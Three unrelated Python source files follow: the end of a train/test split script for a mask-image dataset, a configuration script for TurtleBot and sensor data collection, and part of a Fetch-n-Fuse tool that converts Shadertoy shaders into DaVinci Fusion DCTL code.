                 '../../data/train/annotations/maksssksksss' + str(train_num) + '.xml')
        train_num += 1
# Copy test images/annotations 1:1 (no oversampling), renumbered sequentially.
test_num = 0
for filename in test_list:
    img_id = int(re.findall(r'\d+', filename)[0])
    image_name = '../../data/original_data/images/maksssksksss' + str(img_id)+'.png'
    # The annotation is parsed but its objects are not inspected here; the
    # file is copied unconditionally.
    dom = parse(os.path.join('../../data/original_data/annotations', filename))
    root = dom.documentElement
    objects = root.getElementsByTagName("object")
    copyfile(image_name, '../../data/test/images/maksssksksss' + str(test_num) + '.png')
    copyfile(os.path.join('../../data/original_data/annotations', filename), \
             '../../data/test/annotations/maksssksksss' + str(test_num) + '.xml')
    test_num += 1
print('total training num: ', train_num)
print('total testing num: ', test_num)
|
from data_generation.real_data.collect import Collector
# Configuration script for real-data collection: builds one nested `config`
# dict (turtlebots, sensors, cameras, lasers, lights, detector, server) and
# hands it to Collector.
config = dict()
config["data_config"] = dict()
# 0.6, -0.6, 0.0
config["turtlebot_config"] = dict()
################################################################################
# Important Parameters
################################################################################
config["data_config"]["dst_folder"] = "d:\\M"
config["turtlebot_config"]["initial_indices"] = [0] # [i, j] or [i]
config["sensor_config"] = dict()
config["sensor_config"]["use_laser"] = True
config["sensor_config"]["use_rf"] = True
config["sensor_config"]["use_sound"] = True
################################################################################
# X: 0.6, -0.6
# leftbottom: 0.6, -1.0, 0.0
# righttop: 2.1, -2.1, 0.0
# config["turtlebot_config"]["area_range"] = [[0.0, -0.6], [1.6, -1.6]]
# config["turtlebot_config"]["area_range"] = [[1.0, -1.0], [2.0, -2.0]]
config["turtlebot_config"]["area_range"] = [[0.80, -0.80], [2.80, -2.40]]
config["turtlebot_config"]["angle_range"] = [0.0, 180.0]
config["turtlebot_config"]["spatial_step"] = 0.20 # default 0.1
config["turtlebot_config"]["angle_step"] = 20.0 # max 180, default 20.0
config["turtlebot_config"]["min_distance"] = 0.35
config["turtlebot_config"]["ports"] = ["11311", "11312"]
config["turtlebot_config"]["master_ip"] = "192.168.50.192"
config["turtlebot_config"]["num_turtlebots"] = len(config["turtlebot_config"]["initial_indices"])
config["turtlebot_config"]["dummy_points"] = [[0.0, 0.0], [0.0, 0.0]]
# (Korean section marker below: "additional turtlebot config")
'''
turtlebot config 추가
'''
# Robot ids are 1-based strings: "1", "2", ...
config["turtlebot_config"]["using_list"] = ['{}'.format(i + 1)
                                            for i in range(config["turtlebot_config"]["num_turtlebots"])]
config["turtlebot_config"]["1"] = dict()
config["turtlebot_config"]["2"] = dict()
config["turtlebot_config"]["1"]["ip"] = '192.168.50.124'
config["turtlebot_config"]["1"]["username"] = 'ubuntu'
config["turtlebot_config"]["1"]["password"] = '<PASSWORD>'
# NOTE(review): key "roslanuch" is a typo for "roslaunch", but it is a
# runtime dict key — confirm no consumer reads it before renaming.
config["turtlebot_config"]["1"]["roslanuch"] = 'roslaunch turtlebot3_bringup turtlebot3_robot.launch'
config["turtlebot_config"]["2"]["ip"] = '192.168.50.55'
config["turtlebot_config"]["2"]["username"] = 'ubuntu'
config["turtlebot_config"]["2"]["password"] = '<PASSWORD>'
config["turtlebot_config"]["2"]["roslanuch"] = 'roslaunch turtlebot3_bringup turtlebot3_robot.launch'
# (Korean section marker below: "additional roscore config")
'''
roscore config 추가
'''
# One roscore per robot, each with two terminals: roscore itself and the
# navigation launch pinned to that core's ROS_MASTER_URI/port.
config["roscore"] = dict()
config["roscore"]["1"] = dict()
config["roscore"]["2"] = dict()
config["roscore"]["1"]["terminal_1"] = dict()
config["roscore"]["1"]["terminal_2"] = dict()
config["roscore"]["2"]["terminal_1"] = dict()
config["roscore"]["2"]["terminal_2"] = dict()
config["roscore"]["1"]["terminal_1"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
                                                    "c://opt//ros//melodic//x64//setup.bat && " \
                                                    "c://ws//turtlebot3//devel//setup.bat && " \
                                                    "roscore --port 11311"
config["roscore"]["1"]["terminal_2"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
                                                    "c://opt//ros//melodic//x64//setup.bat && " \
                                                    "c://ws//turtlebot3//devel//setup.bat && " \
                                                    "set ROS_MASTER_URI=http://192.168.50.192:11311/ && " \
                                                    "roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=c://ws//maps//map_01.yaml"
config["roscore"]["2"]["terminal_1"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
                                                    "c://opt//ros//melodic//x64//setup.bat && " \
                                                    "c://ws//turtlebot3//devel//setup.bat && " \
                                                    "roscore --port 11312"
config["roscore"]["2"]["terminal_2"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
                                                    "c://opt//ros//melodic//x64//setup.bat && " \
                                                    "c://ws//turtlebot3//devel//setup.bat && " \
                                                    "set ROS_MASTER_URI=http://192.168.50.192:11312/ && " \
                                                    "roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=c://ws//maps//map_02.yaml"
#### Camera ID #####
# DEV_000F310382ED (Reflection Low) #
# DEV_000F310382EC (GT)#
# DEV_000F310382EB (Reflection High #
####################
config["cmos_config"] = dict()
config["cmos_config"]["cam_ids"] = ["DEV_000F310382EB", "DEV_000F310382ED"]
config["cmos_config"]["iterations"] = 3
config["cmos_config"]["exposure_time"] = 5.0e+5 # micro seconds
# config["cmos_config"]["exposure_time"] = 5.0e+3 # micro seconds
config["cmos_config"]["timeout_time"] = int(5.0e+3) # milli seconds
config["depth_config"] = dict()
config["depth_config"]["something"] = None
# If the port number of window is COM1, the cport_nr is 0
# The bdrate must be 9600
# The laser power must be 0 to 100
config["laser_config"] = dict()
config["laser_config"]["cport_nr"] = 2
config["laser_config"]["bdrate"] = 9600
config["laser_config"]["laser1"] = 100
config["laser_config"]["laser2"] = 76
config["laser_config"]["laser3"] = 85
# config["laser_config"]["laser1"] = 5
# config["laser_config"]["laser2"] = 5
# config["laser_config"]["laser3"] = 5
config["galvanometer_config"] = dict()
config["galvanometer_config"]["num_grid"] = 5
config["galvanometer_config"]["voltage_range"] = [-10.0, 10.0]
# config for light
config["light_config"] = dict()
# NOTE(review): the original comment here was mojibake (likely Korean names
# identifying the four bulbs below) — confirm the bulb order/mapping.
config["light_config"]["bulb_list"] = ["192.168.50.61", "192.168.50.62", "192.168.50.175", "192.168.50.39"]
config["light_config"]["gt_brightness"] = 100
config["light_config"]["laser_brightness"] = 1
# config for detector
config["detector_config"] = dict()
config["detector_config"]["detectron_root"] = "C:\\Users\\vclab\\PycharmProjects\\detectron2"
config["detector_config"]["config_file"] = "configs/novel/retinanet_R_50_FPN_1x.yaml"
config["detector_config"]["check_point"] = "output/novel/model_0004999.pth"
# (Korean section marker below: "acoustic-field sensor related part")
'''
음장 센서 관련 부분
'''
# # config for arduino
# config['arduino_config'] = dict()
# config['arduino_config']['port'] = "COM5"
# config['arduino_config']['baudrate'] = 9600
#
# # config for echo
# config["echo_config"] = dict()
# config["echo_config"]["device"] = "ASIO4ALL v2"
# config["echo_config"]["samplerate"] = 48000
# config["echo_config"]["bit_depth"] = "float32"
# config["echo_config"]["input_mapping"] = [1, 2, 3, 4, 5, 6, 7, 8]
# config["echo_config"]["output_mapping"] = [1, 2]
#
# config['echo_config']['amplitude'] = 1
# config['echo_config']['frequency'] = [20, 20000]
# config['echo_config']['transmit_duration'] = 0.1
# config['echo_config']['record_duration'] = 1
#
# config['echo_config']['folder_path'] = 'sound/data/'
# (Korean section marker below: "socket communication config")
'''
소켓 통신 관련 config
'''
server = dict()
server['ip'] = "192.168.50.174"
server['port'] = 8888
config['server'] = server
if __name__ == '__main__':
    collector = Collector(config)
    # collector.initialize()
    collector.collect()
|
<reponame>nmbr73/Fetch-n-Fuse
#!/usr/bin/env python3
import os
import sys
import pathlib
import io
import re
import requests
import json
import yaml
import argparse
from dotenv import load_dotenv
# Output directory for generated conversion artifacts.
CONVERSIONS_PATH = './Conversions/'
# Module-level flags, overridable via CLI argument parsing elsewhere.
VERBOSE = False
NOASSETS = False
# Maps a Shadertoy media path (as it appears in shader JSON) to metadata
# describing the local asset it corresponds to.
MEDIAMAP = {
    "/media/a/52d2a8f514c4fd2d9866587f4d7b2a5bfa1a11a0e772077d7682deb8b3b517e5.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 1" },
    "/media/a/bd6464771e47eed832c5eb2cd85cdc0bfc697786b903bfd30f890f9d4fc36657.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 2" },
    "/media/a/8979352a182bde7c3c651ba2b2f4e0615de819585cc37b7175bcefbca15a6683.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 3" },
    "/media/a/85a6d68622b36995ccb98a89bbb119edf167c914660e4450d313de049320005c.png" : { "type": "Texture", "folder":"Textures", "name":"Bayer" },
    "/media/a/cb49c003b454385aa9975733aff4571c62182ccdda480aaba9a8d250014f00ec.png" : { "type": "Texture", "folder":"Textures", "name":"Blue Noise" },
    "/media/a/08b42b43ae9d3c0605da11d0eac86618ea888e62cdd9518ee8b9097488b31560.png" : { "type": "Texture", "folder":"Textures", "name":"Font 1" },
    "/media/a/0c7bf5fe9462d5bffbd11126e82908e39be3ce56220d900f633d58fb432e56f5.png" : { "type": "Texture", "folder":"Textures", "name":"Gray Noise Medium"},
    "/media/a/0a40562379b63dfb89227e6d172f39fdce9022cba76623f1054a2c83d6c0ba5d.png" : { "type": "Texture", "folder":"Textures", "name":"Gray Noise Small" },
    "/media/a/fb918796edc3d2221218db0811e240e72e340350008338b0c07a52bd353666a6.jpg" : { "type": "Texture", "folder":"Textures", "name":"Lichen" },
    "/media/a/8de3a3924cb95bd0e95a443fff0326c869f9d4979cd1d5b6e94e2a01f5be53e9.jpg" : { "type": "Texture", "folder":"Textures", "name":"London" },
    "/media/a/cbcbb5a6cfb55c36f8f021fbb0e3f69ac96339a39fa85cd96f2017a2192821b5.png" : { "type": "Texture", "folder":"Textures", "name":"Nyancat" },
    "/media/a/cd4c518bc6ef165c39d4405b347b51ba40f8d7a065ab0e8d2e4f422cbc1e8a43.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 1" },
    "/media/a/92d7758c402f0927011ca8d0a7e40251439fba3a1dac26f5b8b62026323501aa.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 2" },
    "/media/a/79520a3d3a0f4d3caa440802ef4362e99d54e12b1392973e4ea321840970a88a.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 3" },
    "/media/a/3871e838723dd6b166e490664eead8ec60aedd6b8d95bc8e2fe3f882f0fd90f0.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 4" },
    "/media/a/ad56fba948dfba9ae698198c109e71f118a54d209c0ea50d77ea546abad89c57.png" : { "type": "Texture", "folder":"Textures", "name":"Pebbles" },
    "/media/a/f735bee5b64ef98879dc618b016ecf7939a5756040c2cde21ccb15e69a6e1cfb.png" : { "type": "Texture", "folder":"Textures", "name":"RGBA Noise Medium"},
    "/media/a/3083c722c0c738cad0f468383167a0d246f91af2bfa373e9c5c094fb8c8413e0.png" : { "type": "Texture", "folder":"Textures", "name":"RGBA Noise Small" },
    "/media/a/10eb4fe0ac8a7dc348a2cc282ca5df1759ab8bf680117e4047728100969e7b43.jpg" : { "type": "Texture", "folder":"Textures", "name":"Rock Tiles" },
    "/media/a/95b90082f799f48677b4f206d856ad572f1d178c676269eac6347631d4447258.jpg" : { "type": "Texture", "folder":"Textures", "name":"Rusty Metal" },
    "/media/a/e6e5631ce1237ae4c05b3563eda686400a401df4548d0f9fad40ecac1659c46c.jpg" : { "type": "Texture", "folder":"Textures", "name":"Stars" },
    "/media/a/1f7dca9c22f324751f2a5a59c9b181dfe3b5564a04b724c657732d0bf09c99db.jpg" : { "type": "Texture", "folder":"Textures", "name":"Wood" },
    "/media/previz/buffer00.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer A" },
    "/media/previz/buffer01.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer B" },
    "/media/previz/buffer02.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer C" },
    "/media/previz/buffer03.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer D" },
    "/media/a/94284d43be78f00eb6b298e6d78656a1b34e2b91b34940d02f1ca8b22310e8a0.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Forest_0" },
    "/media/a/0681c014f6c88c356cf9c0394ffe015acc94ec1474924855f45d22c3e70b5785.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Forest Blurred_0" },
    "/media/a/488bd40303a2e2b9a71987e48c66ef41f5e937174bf316d3ed0e86410784b919.jpg" : { "type": "Cubemap", "folder":"Cubemaps", "name":"St Peters Basilica_0" },
    "/media/a/550a8cce1bf403869fde66dddf6028dd171f1852f4a704a465e1b80d23955663.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"St Peters Basilica Blurred_0" },
    "/media/a/585f9546c092f53ded45332b343144396c0b2d70d9965f585ebc172080d8aa58.jpg" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Uffizi Gallery_0" },
    "/media/a/793a105653fbdadabdc1325ca08675e1ce48ae5f12e37973829c87bea4be3232.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Uffizi Gallery Blurred_0" },
    "/presets/tex00.jpg" : { "type": "Preset", "folder":"Misc", "name":"Keyboard" },
    # /presets/tex00.jpg does not work, or does it?!?
    # thumbnail says it's previz/keyboard.png ?!?
}
# Derive the file suffix ("jpg"/"png") from the last 3 chars of each path key.
for k,v in MEDIAMAP.items():
    v["suffix"]=k[-3:]
# ---------------------------------------------------------------------------------------------------------------------
def verbose(msg):
    """Print *msg* to stdout only when the module-level VERBOSE flag is set."""
    if not VERBOSE:
        return
    print(msg)
# ---------------------------------------------------------------------------------------------------------------------
def patch_webgl(code,fuse_name,buffer_name):
    """
    Do simple text replacement to make some WebGL to DCTL conversions.

    NOTE(review): this is a best-effort, regex-based source transformation —
    the order of the substitutions below is significant; do not reorder.
    Translates swizzles (.rgba -> swiN(...)), texture() calls, math function
    names, float literals, vecN types, and rewrites mainImage() into a
    __KERNEL__ entry point named after `fuse_name`/`buffer_name`.
    """
    code = code.replace("\t", "    ")
    # --- dimensions
    code=re.sub(r'([^\w])(fragCoord)\.xy([^\w])',r'\1\2\3', code)
    code=re.sub(r'([^\w])(iResolution)\.xy([^\w])',r'\1\2\3', code)
    # rgba handling could still be improved (e.g. ").rgb")
    code=re.sub(r'(\w+\.)(rgba)',r'\1xyzw', code)
    code=re.sub(r'(\w+\.)(rgb)',r'\1xyz', code)
    code=re.sub(r'(\w+\.)(rbg)',r'\1xzy', code)
    code=re.sub(r'(\w+\.)(rg)',r'\1xy', code)
    code=re.sub(r'(\w+\.)(r)([\s\)\,\;\*\\\-\+/])',r'\1x\3', code)
    code=re.sub(r'(\w+\.)(g)([\s\)\,\;\*\\\-\+/])',r'\1y\3', code)
    code=re.sub(r'(\w+\.)(b)([\s\)\,\;\*\\\-\+/])',r'\1z\3', code)
    code=re.sub(r'(\w+\.)(a)([\s\)\,\;\*\\\-\+/])',r'\1w\3', code)
    #code=re.sub(r'(\w+)\.([xyzw]{2,4})',r'swi\2(\1)', code)
    # Multi-component swizzles become swi2/swi3/swi4 helper calls.
    code=re.sub(r'(\w+)\.([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi2(\1,\2,\3)\4', code)
    code=re.sub(r'(\w+)\.([xyzw])([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi3(\1,\2,\3,\4)\5', code)
    code=re.sub(r'(\w+)\.([xyzw])([xyzw])([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi4(\1,\2,\3,\4,\5)\6', code)
    # --- arrays
    code=re.sub(r'(^\s?)(\w+)(\[\s?\])\s*(\w+)',r'\1\2 \4\3', code) # declaration
    #code=re.sub(r'(^\w+)texture(\s*)\(',r'\g<1>_tex2DVecN\2(',code)
    code=re.sub(r'(.*)texture(\s*\(\s*)(\w+)\s*\,\s*(\w+)\s*\)','\g<1>_tex2DVecN\g<2>\g<3>,\g<4>.x,\g<4>.y,15)',code)
    #code=re.sub(r'(sampler2D)(\s*\w+)','__Texture2D__\2',code) # still collides with the kernel call - would have to be changed there as well
    # --- math functions
    for s in [
        # prefix, suffix, functions
        [ '' , '_f', 'mod'], # '_f' suffix to redirect to own implementation
        [ '_', 'f' , 'pow|log2|log10|log|copysign|saturate|sqrt|trunc|hypot|cos|sin|cospi|sinpi|tan|acos|asinh|atanh|cosh|sinh|tanh|cbrt|lgamma|tgamma|rsqrt|exp|exp2'],
        [ '_', '2f', 'atan'],
        [ '_f', 'f' , 'max|min|dim'],
        [ '_' , '' , 'ceil|floor|mix'],
        [ '_f', '' , 'maf|divide|recip|abs|remainder']
    ]:
        code=re.sub(r'([^\w])('+s[2]+r')(\s*)\(',r'\g<1>'+s[0]+r'\g<2>'+s[1]+r'\3(', code)
    # --- float literals
    # Each substitution is applied twice on purpose: adjacent literals can
    # share a delimiter character, so a single pass misses every other match.
    code=re.sub(r'([ \(,\+\-\*=/<>]+)(\.[0-9]+f{0,1})([ \),\+\-\*=;/<>]+)',r'\g<1>0\2\3', code)
    code=re.sub(r'([ \(,\+\-\*=/<>]+)(\.[0-9]+f{0,1})([ \),\+\-\*=;/<>]+)',r'\g<1>0\2\3', code)
    code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.)([ \),\+\-\*=;/<>]+)',r'\1\g<2>0\3', code)
    code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.)([ \),\+\-\*=;/<>]+)',r'\1\g<2>0\3', code)
    code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.[0-9]+)([ \),\+\-\*=;/<>]+)',r'\1\2f\3', code)
    code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.[0-9]+)([ \),\+\-\*=;/<>]+)',r'\1\2f\3', code)
    # --- vector types
    # vecN ... = -> floatN ... =
    code=re.sub(r'\n(\s*)vec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1float\2\3', code)
    code=re.sub(r'\n(\s*)const(\s+)vec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1const\2float\3\4', code)
    # ivecN ... = -> intN ... =
    code=re.sub(r'\n(\s*)ivec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1int\2\3', code)
    code=re.sub(r'\n(\s*)const(\s+)ivec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1const\2int\3\4', code)
    # vecN(float) -> to_floatN_s(float)
    code=re.sub(r'vec([234])(\s*\(\s*[0-9]+\.[0-9]+f\s*\))',r'to_float\1_s\2', code)
    # try to catch floatN_aw constructions - of course this only works to a very limited extent
    code=re.sub(r'vec([34])(\s*\([^,]+,[^,\)]+\))',r'to_float\1_aw\2', code)
    code=re.sub(r'ivec([234])(\s*\()',r'to_int\1\2', code)
    code=re.sub(r'vec([234])(\s*\()',r'to_float\1\2', code)
    # finally, knock out all remaining 'vecN' occurrences:
    code=re.sub(r'([\s\(\)\*\+\-;,=])ivec([234])(\s)',r'\1int\2\3', code)
    code=re.sub(r'([\s\(\)\*\+\-;,=])vec([234])(\s)',r'\1float\2\3', code)
    # --- kernel function
    kernel_name=fuse_name+'Fuse'
    if buffer_name!="Image":
        kernel_name=fuse_name+'Fuse__'+buffer_name.replace(" ","_")
    # Collect only those Shadertoy uniforms actually referenced by the code
    # and append them as kernel parameters.
    kernel_parameters=""
    for e in [
        ['iTime','float iTime'],
        ['iResolution','float2 iResolution'],
        ['iMouse','float4 iMouse'],
        ['iTimeDelta' , 'float iTimeDelta'],
        ['iFrame' , 'int iFrame'],
        ['iChannelTime' , 'float iChannelTime[]'],
        ['iChannelResolution' , 'float3 iChannelResolution[]'],
        ['iDate' , 'float4 iDate'],
        ['iSampleRate' , 'float iSampleRate'],
        ['iChannel0', 'sampler2D iChannel0'],
        ['iChannel1', 'sampler2D iChannel1'],
        ['iChannel2', 'sampler2D iChannel2'],
        ['iChannel3', 'sampler2D iChannel3'],
    ]:
        if code.find(e[0])!=-1: # okay, a plain find() is quite crude here - but it should do for now
            kernel_parameters=kernel_parameters+", "+e[1]
    if buffer_name!='Common':
        # kernel invocation
        # We only catch the signatures with fragColor and fragCoord? Are there
        # Shadertoy entry points without these two, or with more parameters?!?
        #
        match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*in\s+float2\s+([A-Za-z_]\w*)\s*\)\s*{'
        m = re.search(match_kernel,code)
        if not m:
            # quick shot and no real solution; had a shader without 'in' on the vec2
            match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*float2\s+([A-Za-z_]\w*)\s*\)\s*{'
            m = re.search(match_kernel,code)
        if not m:
            # quick shot and no real solution; had a shader with a comment after the kernel name
            match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*float2\s+([A-Za-z_]\w*)\s*\)\s*//[^\n]*\n{'
            m = re.search(match_kernel,code)
        if m:
            fragColor=m.group(1)
            code = re.sub(match_kernel,
                '__KERNEL__ void '+kernel_name+'(float4 \\1, float2 \\2'+kernel_parameters+')\n{\n'
                , code)
            # Now try to splice the output call in at the very end:
            p=code.rfind("}")
            if p!=-1:
                code=code[0:p] + "\n\n  SetFragmentShaderComputedColor("+ fragColor +");\n" +code[p]
        else:
            print("attention: no kernel found in "+buffer_name)
    # Try to find function definitions and mark them __DEVICE__:
    code=re.sub(r'(\n\s*)(mat[2-4]|float[1-4]{0,1}|int|void|bool)(\s+[A-Za-z_]\w*\s*\([^\)]*\)\s*{)',r'\g<1>__DEVICE__ \g<2>\g<3>',code)
    return code
# ---------------------------------------------------------------------------------------------------------------------
def as_fuse_id(shader_name, shader_id):
    """
    Derive an identifier from *shader_name*.

    Strips whitespace, leading digits and special characters so the result
    can be used as an identifier — in particular as the first parameter to
    `FuRegisterClass()`. (`shader_id` is currently unused here.)
    """
    # Example: "Fork Who cares? nmbr73 321" -> "Who cares?"
    ident = re.sub(r'^Fork (.+) ([^ ]+) \d+$', r'\1', shader_name)
    # Replace every run of invalid characters with a single space
    ident = re.sub(r'[^A-Za-z0-9 ]+', ' ', ident)
    # Prefix 'D' if the name would start with a digit
    ident = re.sub(r'^(\d.*)$', r'D\1', ident)
    # Capitalize word starts, then squeeze out all whitespace
    return ''.join(ch for ch in ident.title() if not ch.isspace())
# ---------------------------------------------------------------------------------------------------------------------
def as_fuse_name(shader_name, shader_id):
    """
    Derive a fuse name from *shader_name*.

    The fuse name is what gets passed as `REGS_Name` to `FuRegisterClass()`;
    it shows up in the 'Add Tool' context menu, the 'Select Tool' dialog,
    the 'Effects' panel, the 'About' dialog, etc. When a node is inserted
    into a composition, DaFusion also derives an identifier from this name
    (eliminating whitespace and leading digits) so it can be used in
    expressions and settings files. Currently identical to `as_fuse_id()`.
    """
    return as_fuse_id(shader_name, shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def as_kernel_name(shader_name, shader_id):
    """Derive the DCTL kernel function name from *shader_name* (same rules as `as_fuse_id`)."""
    return as_fuse_id(shader_name, shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def as_file_name(shader_name, shader_id):
    """
    Derive a filename (without suffix) from *shader_name*.

    Used for all the temporary '.json', '.yaml', '.c', etc. files generated
    by `fetch`, and usable as the filename for the '.md' and '.fuse' files
    created by `fuse`. Currently identical to `as_fuse_id()`.
    """
    return as_fuse_id(shader_name, shader_id)
# ---------------------------------------------------------------------------------------------------------------------
def create_json(shader_id):
    """
    See if there is a JSON file with the given `shader_id`.

    Checks `CONVERSIONS_PATH` and the environment's `DOWNLOADS` folder for a
    JSON file containing the shader `shader_id`; fetches it from the
    shadertoy.com API as a last resort, then stores it under a name derived
    from the shader's title.
    @return (string) filename (without '.<ID>.json').
    """
    # already converted? ('<name>.<id>.json' in the conversions folder)
    files = [entry for entry in os.scandir(CONVERSIONS_PATH) if entry.is_file() and entry.name.endswith(f".{shader_id}.json")]
    if len(files) > 1:
        raise Exception(f"multiple files matching '{CONVERSIONS_PATH}*.{shader_id}.json'")
    if len(files) == 1:
        conv_name = files[0].name
        conv_name = conv_name[0:len(conv_name)-len(f".{shader_id}.json")]
        return conv_name
    # then we have to read and parse the json to get a filename
    json_text = None
    remove_file = None
    # try to read from shader_ID.json file
    if json_text is None:
        fname = f"shader_{shader_id}.json"
        if os.path.isfile(CONVERSIONS_PATH + fname):
            # BUG FIX: the log prints in this function were missing the 'f'
            # prefix and printed the literal text '{fname}' / '{remove_file}'
            print(f"read {fname} file")
            with open(CONVERSIONS_PATH + fname, "r") as f:
                json_text = f.read()
            remove_file = CONVERSIONS_PATH + fname
    # try to read shader_ID.json from downloads
    if json_text is None:
        fname = f"shader_{shader_id}.json"
        downloads = os.getenv('DOWNLOADS')
        if downloads is not None and downloads != "" and os.path.isfile(downloads + fname):
            print(f"read {fname} from downloads")
            with open(downloads + fname, "r") as f:
                json_text = f.read()
    # try to fetch from shadertoy.com
    if json_text is None:
        print("fetch JSON from shadertoy.com")
        response = requests.get("https://www.shadertoy.com/api/v1/shaders/" + shader_id + "?key=" + os.getenv('APIKEY'),
            headers={"user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"}
            )
        if response.status_code != 200:
            raise Exception("HTTP Error " + str(response.status_code))
        json_text = response.text
    # no options left if we still got no json (unreachable)
    if json_text is None:
        raise Exception(f"unable to get json data for {shader_id}")
    # extract filename from json data
    json_data = json.loads(json_text)
    error = json_data.get('Error', None)
    if error is not None:
        raise Exception(error)
    if 'Shader' in json_data:
        json_data = json_data['Shader']
    shader_name = json_data['info']['name']
    conv_name = as_file_name(shader_name, shader_id)
    # write file
    outfilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.json"
    print(f"write to {outfilepath}")
    with io.open(outfilepath, 'w') as f:
        f.write(json_text)
    # delete shader_ID.json if in our folder
    if remove_file is not None:
        print(f"delete {remove_file}")
        os.remove(remove_file)
    return conv_name
# ---------------------------------------------------------------------------------------------------------------------
def read_json(conv_name, shader_id):
    """
    Get all the Shadertoy information as a JSON structure.

    Reads `<CONVERSIONS_PATH><conv_name>.<shader_id>.json`, unwraps the
    'Shader' envelope if present, and normalizes the renderpass inputs so
    later stages can rely on 'ctype', 'src' and 'name' being present.
    Raises if the file is missing or the payload carries an 'Error' field.
    """
    json_text = None
    # --- read file
    infilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.json"
    if not os.path.isfile(infilepath):
        raise Exception(f"{infilepath} does not exists")
    verbose(f"read from {infilepath}")
    with open(infilepath, "r") as f:
        json_text=f.read()
    # --- parse json
    json_data = json.loads(json_text)
    error = json_data.get('Error',None)
    if error != None:
        raise Exception(error)
    if 'Shader' in json_data:
        json_data = json_data['Shader']
    # --- fix json data
    # some payloads come without an author name; fill in a placeholder
    if not ('username' in json_data['info']):
        json_data['info']['username']="N.N."
    for entry in json_data['renderpass']:
        for input in entry.get('inputs',{}):
            # presumably older API payloads carry 'type'/'filepath' instead of
            # 'ctype'/'src' - TODO confirm against the Shadertoy API
            if not 'ctype' in input:
                input['ctype']=input['type']
            if not 'src' in input:
                input['src']=input['filepath']
            if 'name' in input:
                raise Exception("input already has a name?!?")
            # map the raw asset path to a human-readable label when known
            media=MEDIAMAP.get(input['src'],None)
            if media==None:
                input['name']=input['src']
            else:
                input['name']=media['type']+': '+media['name']
    return json_data
# ---------------------------------------------------------------------------------------------------------------------
def create_yaml(conv_name, shader_id, json_data):
    """Write the '<conv_name>.<shader_id>.yaml' metadata file, unless it already exists."""
    yaml_filename = f"{conv_name}.{shader_id}.yaml"
    if os.path.isfile(CONVERSIONS_PATH + yaml_filename):
        return
    info = json_data['info']
    shader_name = json_data['info']['name']
    # metadata about the original Shadertoy shader
    shader_meta = {
        'id': shader_id,
        'name': shader_name,
        'author': info['username'],
        'url': 'https://www.shadertoy.com/view/' + shader_id,
        'description': info['description'],
        'tags': info['tags'],
    }
    # names derived for the generated fuse
    fuse_meta = {
        'id': as_fuse_id(shader_name, shader_id),
        'name': as_fuse_name(shader_name, shader_id),
        'file': as_file_name(shader_name, shader_id),
        'kernel': as_kernel_name(shader_name, shader_id),
        'author': os.getenv('AUTHOR'),
    }
    # record the forked-from shader when the API provides it
    if "parentid" in info and "parentname" in info:
        shader_meta['parent'] = {
            'id': info['parentid'],
            'name': info['parentname'],
            'url': 'https://www.shadertoy.com/view/' + info['parentid'],
        }
    with io.open(CONVERSIONS_PATH + yaml_filename, 'w', encoding='utf8') as outfile:
        yaml.dump({'shader': shader_meta, 'fuse': fuse_meta}, outfile,
                  default_flow_style=False, allow_unicode=True)
# # ---------------------------------------------------------------------------------------------------------------------
# def read_yaml(conv_name, shader_id):
# """
# Get infortmation stored in the YAML file.
# """
# yaml_text = None
# # --- read file
# infilepath = f"{CONVERSIONS_PATH}{conv_name}.{shader_id}.yaml"
# if not os.path.isfile(infilepath):
# raise Exception(f"{infilepath} does not exists")
# verbose(f"read from {infilepath}")
# with open(infilepath, "r") as f:
# yaml_text=f.read()
# yaml_data = yaml.load(yaml_text, Loader=yaml.FullLoader)
# if yaml_data['shader']['id'] != shader_id:
# raise Exception(f"shader id missmatch in yaml file")
# # for old yaml files - can be removed later:
# if not 'kernel' in yaml_data['fuse']:
# shader_name=yaml_data['shader']['name']
# yaml_data['fuse']['kernel'] = as_kernel_name(shader_name,shader_id)
# return yaml_data
# ---------------------------------------------------------------------------------------------------------------------
def create_glsl(conv_name, shader_id, json_data):
